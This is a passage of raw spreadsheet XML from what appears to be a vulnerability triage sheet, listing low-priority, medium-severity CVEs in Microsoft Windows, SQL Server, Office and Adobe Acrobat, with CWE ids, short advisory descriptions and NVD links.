r="I1293" s="5" t="inlineStr" /><c r="J1293" s="5" t="inlineStr" /><c r="K1293" s="5" t="inlineStr" /><c r="L1293" s="5" t="inlineStr" /><c r="M1293" s="5" t="inlineStr" /><c r="N1293" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1293" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1293" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1293" s="5" t="inlineStr" /><c r="R1293" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1293" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Task Scheduler allows an authorized attacker to disclose information locally.</t></is></c><c r="T1293" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72945</t></is></c></row><row r="1294"><c r="A1294" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1294" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1294" s="5" t="inlineStr"><is><t>CVE-2026-72964</t></is></c><c r="D1294" s="5" t="n"><v>5.5</v></c><c r="E1294" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1294" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1294" s="5" t="inlineStr" /><c r="H1294" s="5" t="n"><v>0.003</v></c><c r="I1294" s="5" t="inlineStr" /><c r="J1294" s="5" t="inlineStr" /><c r="K1294" s="5" t="inlineStr" /><c r="L1294" s="5" t="inlineStr" /><c r="M1294" s="5" t="inlineStr" /><c r="N1294" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1294" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1294" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1294" s="5" t="inlineStr" /><c r="R1294" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1294" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Internet Connection Sharing (ICS) allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1294" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72964</t></is></c></row><row r="1295"><c r="A1295" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1295" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1295" s="5" t="inlineStr"><is><t>CVE-2026-72966</t></is></c><c r="D1295" s="5" t="n"><v>5.5</v></c><c r="E1295" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1295" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1295" s="5" t="inlineStr" /><c r="H1295" s="5" t="n"><v>0.003</v></c><c r="I1295" s="5" t="inlineStr" /><c r="J1295" s="5" t="inlineStr" /><c r="K1295" s="5" t="inlineStr" /><c r="L1295" s="5" t="inlineStr" /><c r="M1295" s="5" t="inlineStr" /><c r="N1295" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1295" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1295" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1295" s="5" t="inlineStr" /><c r="R1295" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1295" s="5" t="inlineStr"><is><t>Missing authorization in Windows Remote Access Connection Manager allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1295" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72966</t></is></c></row><row r="1296"><c r="A1296" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1296" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1296" s="5" t="inlineStr"><is><t>CVE-2026-73004</t></is></c><c r="D1296" s="5" t="n"><v>5.5</v></c><c r="E1296" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1296" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1296" s="5" t="inlineStr" /><c r="H1296" s="5" t="n"><v>0.002</v></c><c r="I1296" s="5" t="inlineStr" /><c r="J1296" s="5" t="inlineStr" /><c r="K1296" s="5" t="inlineStr" /><c r="L1296" s="5" t="inlineStr" /><c r="M1296" s="5" t="inlineStr" /><c r="N1296" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1296" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1296" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1296" s="5" t="inlineStr" /><c r="R1296" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1296" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Autopilot allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1296" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73004</t></is></c></row><row r="1297"><c r="A1297" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1297" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1297" s="5" t="inlineStr"><is><t>CVE-2026-73008</t></is></c><c r="D1297" s="5" t="n"><v>5.5</v></c><c r="E1297" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1297" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1297" s="5" t="inlineStr" /><c r="H1297" s="5" t="n"><v>0.005</v></c><c r="I1297" s="5" t="inlineStr" /><c r="J1297" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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97" s="5" t="inlineStr" /><c r="M1297" s="5" t="inlineStr" /><c r="N1297" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1297" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1297" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1297" s="5" t="inlineStr" /><c r="R1297" s="5" t="inlineStr"><is><t>CWE-359</t></is></c><c r="S1297" s="5" t="inlineStr"><is><t>Exposure of private personal information to an unauthorized actor in Windows Biometric Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1297" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73008</t></is></c></row><row r="1298"><c r="A1298" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1298" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1298" s="5" t="inlineStr"><is><t>CVE-2026-77488</t></is></c><c r="D1298" s="5" t="n"><v>5.5</v></c><c r="E1298" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1298" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1298" s="5" t="inlineStr" /><c r="H1298" s="5" t="n"><v>0.003</v></c><c r="I1298" s="5" t="inlineStr" /><c r="J1298" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1298" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1298" s="5" t="inlineStr" /><c r="M1298" s="5" t="inlineStr" /><c r="N1298" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1298" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1298" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1298" s="5" t="inlineStr" /><c r="R1298" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S1298" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in SQL Server allows an authorized attacker to disclose information locally.</t></is></c><c r="T1298" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77488</t></is></c></row><row r="1299"><c r="A1299" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1299" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1299" s="5" t="inlineStr"><is><t>CVE-2026-77491</t></is></c><c r="D1299" s="5" t="n"><v>5.5</v></c><c r="E1299" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1299" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1299" s="5" t="inlineStr" /><c r="H1299" s="5" t="n"><v>0.004</v></c><c r="I1299" s="5" t="inlineStr" /><c r="J1299" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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9" s="5" t="inlineStr" /><c r="M1299" s="5" t="inlineStr" /><c r="N1299" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1299" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1299" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1299" s="5" t="inlineStr" /><c r="R1299" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1299" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows GDI allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1299" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77491</t></is></c></row><row r="1300"><c r="A1300" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1300" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1300" s="5" t="inlineStr"><is><t>CVE-2026-77492</t></is></c><c r="D1300" s="5" t="n"><v>5.5</v></c><c r="E1300" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1300" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1300" s="5" t="inlineStr" /><c r="H1300" s="5" t="n"><v>0.003</v></c><c r="I1300" s="5" t="inlineStr" /><c r="J1300" s="5" t="inlineStr" /><c r="K1300" s="5" t="inlineStr" /><c r="L1300" s="5" t="inlineStr" /><c r="M1300" s="5" t="inlineStr" /><c r="N1300" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1300" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1300" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1300" s="5" t="inlineStr" /><c r="R1300" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1300" s="5" t="inlineStr"><is><t>Out-of-bounds read in Storage Port Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1300" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77492</t></is></c></row><row r="1301"><c r="A1301" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1301" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1301" s="5" t="inlineStr"><is><t>CVE-2026-78454</t></is></c><c r="D1301" s="5" t="n"><v>5.5</v></c><c r="E1301" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1301" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1301" s="5" t="inlineStr" /><c r="H1301" s="5" t="n"><v>0.004</v></c><c r="I1301" s="5" t="inlineStr" /><c r="J1301" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K13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301" s="5" t="inlineStr" /><c r="M1301" s="5" t="inlineStr" /><c r="N1301" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1301" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1301" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1301" s="5" t="inlineStr" /><c r="R1301" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1301" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows CD-ROM Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1301" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78454</t></is></c></row><row r="1302"><c r="A1302" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1302" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1302" s="5" t="inlineStr"><is><t>CVE-2026-78506</t></is></c><c r="D1302" s="5" t="n"><v>5.5</v></c><c r="E1302" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1302" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1302" s="5" t="inlineStr" /><c r="H1302" s="5" t="n"><v>0.005</v></c><c r="I1302" s="5" t="inlineStr" /><c r="J1302" s="5" t="inlineStr" /><c r="K1302" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1302" s="5" t="inlineStr" /><c r="M1302" s="5" t="inlineStr" /><c r="N1302" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1302" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1302" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1302" s="5" t="inlineStr" /><c r="R1302" s="5" t="inlineStr"><is><t>CWE-170</t></is></c><c r="S1302" s="5" t="inlineStr"><is><t>Improper null termination in Microsoft Office Word allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1302" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78506</t></is></c></row><row r="1303"><c r="A1303" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1303" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1303" s="5" t="inlineStr"><is><t>CVE-2026-78513</t></is></c><c r="D1303" s="5" t="n"><v>5.5</v></c><c r="E1303" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1303" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1303" s="5" t="inlineStr" /><c r="H1303" s="5" t="n"><v>0.005</v></c><c r="I1303" s="5" t="inlineStr" /><c r="J1303" s="5" t="inlineStr" /><c r="K1303" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L1303" s="5" t="inlineStr" /><c r="M1303" s="5" t="inlineStr" /><c r="N1303" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1303" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1303" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1303" s="5" t="inlineStr" /><c r="R1303" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1303" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1303" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78513</t></is></c></row><row r="1304"><c r="A1304" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1304" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1304" s="5" t="inlineStr"><is><t>CVE-2026-79910</t></is></c><c r="D1304" s="5" t="n"><v>5.5</v></c><c r="E1304" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1304" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1304" s="5" t="inlineStr" /><c r="H1304" s="5" t="n"><v>0.002</v></c><c r="I1304" s="5" t="inlineStr" /><c r="J1304" s="5" t="inlineStr" /><c r="K1304" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1304" s="5" t="inlineStr" /><c r="M1304" s="5" t="inlineStr" /><c r="N1304" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1304" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1304" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1304" s="5" t="inlineStr" /><c r="R1304" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1304"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04" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79910</t></is></c></row><row r="1305"><c r="A1305" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1305" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1305" s="5" t="inlineStr"><is><t>CVE-2026-80160</t></is></c><c r="D1305" s="5" t="n"><v>5.5</v></c><c r="E1305" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1305" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1305" s="5" t="inlineStr" /><c r="H1305" s="5" t="n"><v>0.002</v></c><c r="I1305" s="5" t="inlineStr" /><c r="J1305" s="5" t="inlineStr" /><c r="K1305" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1305" s="5" t="inlineStr" /><c r="M1305" s="5" t="inlineStr" /><c r="N1305" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1305" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1305" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1305" s="5" t="inlineStr" /><c r="R1305" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1305"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05" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80160</t></is></c></row><row r="1306"><c r="A1306" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1306" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1306" s="5" t="inlineStr"><is><t>CVE-2026-80162</t></is></c><c r="D1306" s="5" t="n"><v>5.5</v></c><c r="E1306" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1306" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1306" s="5" t="inlineStr" /><c r="H1306" s="5" t="n"><v>0.002</v></c><c r="I1306" s="5" t="inlineStr" /><c r="J1306" s="5" t="inlineStr" /><c r="K1306" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1306" s="5" t="inlineStr" /><c r="M1306" s="5" t="inlineStr" /><c r="N1306" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1306" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1306" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1306" s="5" t="inlineStr" /><c r="R1306" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1306"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T1306" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80162</t></is></c></row><row r="1307"><c r="A1307" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1307" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1307" s="5" t="inlineStr"><is><t>CVE-2026-81387</t></is></c><c r="D1307" s="5" t="n"><v>5.5</v></c><c r="E1307" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1307" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1307" s="5" t="inlineStr" /><c r="H1307" s="5" t="n"><v>0.004</v></c><c r="I1307" s="5" t="inlineStr" /><c r="J1307" s="5" t="inlineStr" /><c r="K1307" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1307" s="5" t="inlineStr" /><c r="M1307" s="5" t="inlineStr" /><c r="N1307" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1307" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1307" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1307" s="5" t="inlineStr" /><c r="R1307" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1307" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1307" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81387</t></is></c></row><row r="1308"><c r="A1308" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1308" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1308" s="5" t="inlineStr"><is><t>CVE-2026-81390</t></is></c><c r="D1308" s="5" t="n"><v>5.5</v></c><c r="E1308" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1308" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1308" s="5" t="inlineStr" /><c r="H1308" s="5" t="n"><v>0.004</v></c><c r="I1308" s="5" t="inlineStr" /><c r="J1308" s="5" t="inlineStr" /><c r="K1308" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t></is></c><c r="L1308" s="5" t="inlineStr" /><c r="M1308" s="5" t="inlineStr" /><c r="N1308" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1308" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1308" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1308" s="5" t="inlineStr" /><c r="R1308" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1308" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1308" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81390</t></is></c></row><row r="1309"><c r="A1309" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1309" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1309" s="5" t="inlineStr"><is><t>CVE-2026-81391</t></is></c><c r="D1309" s="5" t="n"><v>5.5</v></c><c r="E1309" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1309" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1309" s="5" t="inlineStr" /><c r="H1309" s="5" t="n"><v>0.004</v></c><c r="I1309" s="5" t="inlineStr" /><c r="J1309" s="5" t="inlineStr" /><c r="K1309" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1309" s="5" t="inlineStr" /><c r="M1309" s="5" t="inlineStr" /><c r="N1309" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1309" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1309" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1309" s="5" t="inlineStr" /><c r="R1309" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1309" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1309" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81391</t></is></c></row><row r="1310"><c r="A1310" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1310" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1310" s="5" t="inlineStr"><is><t>CVE-2026-81392</t></is></c><c r="D1310" s="5" t="n"><v>5.5</v></c><c r="E1310" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1310" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1310" s="5" t="inlineStr" /><c r="H1310" s="5" t="n"><v>0.005</v></c><c r="I1310" s="5" t="inlineStr" /><c r="J1310" s="5" t="inlineStr" /><c r="K1310" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1310" s="5" t="inlineStr" /><c r="M1310" s="5" t="inlineStr" /><c r="N1310" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1310" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1310" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1310" s="5" t="inlineStr" /><c r="R1310" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="S1310" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1310" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81392</t></is></c></row><row r="1311"><c r="A1311" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1311" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1311" s="5" t="inlineStr"><is><t>CVE-2026-81393</t></is></c><c r="D1311" s="5" t="n"><v>5.5</v></c><c r="E1311" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1311" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1311" s="5" t="inlineStr" /><c r="H1311" s="5" t="n"><v>0.004</v></c><c r="I1311" s="5" t="inlineStr" /><c r="J1311" s="5" t="inlineStr" /><c r="K1311" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1311" s="5" t="inlineStr" /><c r="M1311" s="5" t="inlineStr" /><c r="N1311" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1311" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1311" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1311" s="5" t="inlineStr" /><c r="R1311" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1311" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1311" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81393</t></is></c></row><row r="1312"><c r="A1312" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1312" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1312" s="5" t="inlineStr"><is><t>CVE-2026-81394</t></is></c><c r="D1312" s="5" t="n"><v>5.5</v></c><c r="E1312" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1312" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1312" s="5" t="inlineStr" /><c r="H1312" s="5" t="n"><v>0.004</v></c><c r="I1312" s="5" t="inlineStr" /><c r="J1312" s="5" t="inlineStr" /><c r="K1312" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1312" s="5" t="inlineStr" /><c r="M1312" s="5" t="inlineStr" /><c r="N1312" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1312" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1312" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1312" s="5" t="inlineStr" /><c r="R1312" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1312" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1312" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81394</t></is></c></row><row r="1313"><c r="A1313" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1313" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1313" s="5" t="inlineStr"><is><t>CVE-2026-81395</t></is></c><c r="D1313" s="5" t="n"><v>5.5</v></c><c r="E1313" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1313" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1313" s="5" t="inlineStr" /><c r="H1313" s="5" t="n"><v>0.005</v></c><c r="I1313" s="5" t="inlineStr" /><c r="J1313" s="5" t="inlineStr" /><c r="K1313" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1313" s="5" t="inlineStr" /><c r="M1313" s="5" t="inlineStr" /><c r="N1313" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1313" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1313" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1313" s="5" t="inlineStr" /><c r="R1313" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1313" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1313" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81395</t></is></c></row><row r="1314"><c r="A1314" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1314" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1314" s="5" t="inlineStr"><is><t>CVE-2026-81399</t></is></c><c r="D1314" s="5" t="n"><v>5.5</v></c><c r="E1314" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1314" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1314" s="5" t="inlineStr" /><c r="H1314" s="5" t="n"><v>0.004</v></c><c r="I1314" s="5" t="inlineStr" /><c r="J1314" s="5" t="inlineStr" /><c r="K1314" s="5" t="inlineStr"><is><t>microsoft:365_apps, 